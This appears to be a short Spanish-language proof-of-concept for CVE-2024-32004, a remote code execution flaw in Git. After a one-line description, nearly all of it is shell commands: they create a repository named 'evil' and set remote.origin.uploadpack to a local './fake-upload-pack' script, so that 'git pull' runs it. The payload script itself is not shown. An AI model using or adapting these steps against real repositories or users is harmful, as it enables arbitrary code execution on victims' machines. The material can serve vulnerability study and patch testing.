
Exploit de prueba de concepto para CVE-2024-32004, una vulnerabilidad de ejecución remota de código en Git, que demuestra la explotación mediante un filtro upload-pack malicioso.
# Crear el repositorio tmp, establecer uploadpack.allowfilter como true
git init tmp
git -C tmp config uploadpack.allowfilter 1
# Clonar evil desde el repositorio tmp
git clone --filter=blob:none --no-local --no-checkout tmp evil
rm -rf tmp
# Configurar el script de filtro remoto
git -C evil config remote.origin.uploadpack "./fake-upload-pack"
# Ejecutar script malicioso
git pull